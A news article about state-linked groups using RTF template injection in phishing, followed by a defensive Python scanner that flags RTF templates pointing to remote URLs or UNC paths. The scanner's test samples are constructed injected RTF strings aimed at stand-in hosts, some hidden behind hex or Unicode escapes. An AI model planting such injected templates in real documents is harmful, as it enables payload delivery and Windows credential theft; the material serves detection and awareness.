Hackers Are Using RTF Files in Phishing Campaigns
Hackers are increasingly using an RTF template injection technique to phish for information from victims. Three APT hacking groups from India, Russia, and China used a novel RTF template injection technique in their recent phishing campaigns.
Researchers at Proofpoint first spotted the malicious RTF template injections in March 2021, and the firm expects it to become more widely used as time goes on.
Here’s what’s happening, according to Proofpoint:
This technique, referred to as RTF template injection, leverages the legitimate RTF template functionality. It subverts the plain text document formatting properties of an RTF file and allows the retrieval of a URL resource instead of a file resource via an RTF’s template control word capability. This enables a threat actor to replace a legitimate file destination with a URL from which a remote payload may be retrieved.
To put it simply, threat actors place a malicious URL in the RTF file through the template function. When the file is opened, that URL can load a malicious payload into the application or trigger Windows New Technology LAN Manager (NTLM) authentication against the remote URL to steal Windows credentials, which could be disastrous for the user who opens these files.
Where things get really scary is that these files have a lower detection rate by antivirus apps than the well-known Office-based template injection technique. That means you might download the RTF file, run it through an antivirus app and think it’s safe when it’s hiding something sinister.
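Because the technique described above comes down to the value of one RTF control word, a defender can check for it directly rather than relying on antivirus signatures. The script below is an added example and is not Proofpoint's tooling or anything from the article: it extracts the value of the RTF template destination from a document, resolves the standard RTF character escapes (hex `\'hh`, `\uN`, and escaped literals) so that a disguised value still reads as text, and flags the file when that value is a URL or UNC path instead of a local template file. The sample documents, hostnames (`example.invalid`, `fileserver.invalid`) and file names are constructed for illustration.

```python
r"""
Flag RTF documents whose \*\template destination points off-host.

Added example for the article above, not Proofpoint's code. The RTF
samples at the bottom are constructed; example.invalid is a reserved
name and resolves nowhere.
"""
import re

# {\*\template <value>} -- the destination group that names a document's template
TEMPLATE_RE = re.compile(rb"\{\\\*\\template\s*(.*?)\}", re.DOTALL)
LITERAL_RE = re.compile(rb"\\([\\{}])")            # \\  \{  \}  -> literal character
HEX_RE = re.compile(rb"\\'([0-9a-fA-F]{2})")      # \'hh        -> byte 0xhh
UNICODE_RE = re.compile(rb"\\u(-?\d+)\s?\??")     # \uN?        -> code point N, fallback '?' dropped
CONTROL_RE = re.compile(rb"\\[a-zA-Z]+-?\d*\s?")  # any other control word, e.g. \ansi

# Prefixes that mean the template is fetched from somewhere other than local disk.
REMOTE_PREFIXES = ("http://", "https://", "\\\\")  # URL schemes and UNC paths


def decode_rtf_value(raw: bytes) -> str:
    r"""Reduce an RTF destination value to plain text.

    Escaped literals are parked in placeholder bytes first so that the
    control-word stripper does not mistake an escaped backslash for the
    start of a control word (a UNC path \\host\share is written
    \\\\host\\share inside RTF).
    """
    placeholders = {b"\\": b"\x01", b"{": b"\x02", b"}": b"\x03"}
    value = LITERAL_RE.sub(lambda m: placeholders[m.group(1)], raw)
    value = HEX_RE.sub(lambda m: bytes([int(m.group(1), 16)]), value)

    def unicode_sub(m):
        n = int(m.group(1))  # RTF writes code points above 32767 as negatives
        return chr(n + 65536 if n < 0 else n).encode("utf-8")

    value = UNICODE_RE.sub(unicode_sub, value)
    value = CONTROL_RE.sub(b"", value)
    value = value.replace(b"{", b"").replace(b"}", b"")
    for literal, token in placeholders.items():
        value = value.replace(token, literal)
    return value.decode("utf-8", errors="replace").strip()


def template_destinations(rtf: bytes) -> list[str]:
    """Return every decoded template destination found in the document."""
    return [decode_rtf_value(m.group(1)) for m in TEMPLATE_RE.finditer(rtf)]


def is_remote(destination: str) -> bool:
    """True when the template would be retrieved over the network."""
    return destination.lower().startswith(REMOTE_PREFIXES)


def scan_rtf(rtf: bytes) -> dict:
    """Summarise the template destinations and flag any that point off-host."""
    dests = template_destinations(rtf)
    remote = [d for d in dests if is_remote(d)]
    return {"templates": dests, "remote": remote, "suspicious": bool(remote)}


# Constructed sample documents (not real malware).
BENIGN_RTF = rb"{\rtf1\ansi{\*\template C:\\Users\\alice\\Templates\\Normal.dotm}Quarterly report}"
PLAIN_INJECTION = rb"{\rtf1\ansi{\*\template http://example.invalid/template.dotm}Quarterly report}"
HEX_OBFUSCATED = rb"{\rtf1\ansi{\*\template \'68\'74\'74\'70://example.invalid/t}Quarterly report}"
UNICODE_OBFUSCATED = rb"{\rtf1\ansi{\*\template \u104?\u116?\u116?\u112?://example.invalid/u}Quarterly report}"
UNC_TEMPLATE = rb"{\rtf1\ansi{\*\template \\\\fileserver.invalid\\share\\t.dotm}Quarterly report}"

if __name__ == "__main__":
    samples = [
        ("benign", BENIGN_RTF),
        ("plain URL", PLAIN_INJECTION),
        ("hex-escaped URL", HEX_OBFUSCATED),
        ("unicode-escaped URL", UNICODE_OBFUSCATED),
        ("UNC path", UNC_TEMPLATE),
    ]
    for name, doc in samples:
        print(f"{name:20} {scan_rtf(doc)}")
```

A benign document resolves to a local path such as `C:\Users\alice\Templates\Normal.dotm` and is not flagged; the other four samples all resolve to a remote destination even when the scheme is hidden behind hex or Unicode escapes. On a mail gateway or endpoint this check belongs beside, not instead of, the antivirus scan: it looks only at the template destination, so an RTF that carries its payload some other way still needs the usual controls.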
So what can you do to avoid it? Simply don’t download and open RTF files (or any other files, really) from people you don’t know. If something seems suspicious, it probably is. Be careful what you download, and you can mitigate the risk of these RTF template injection attacks.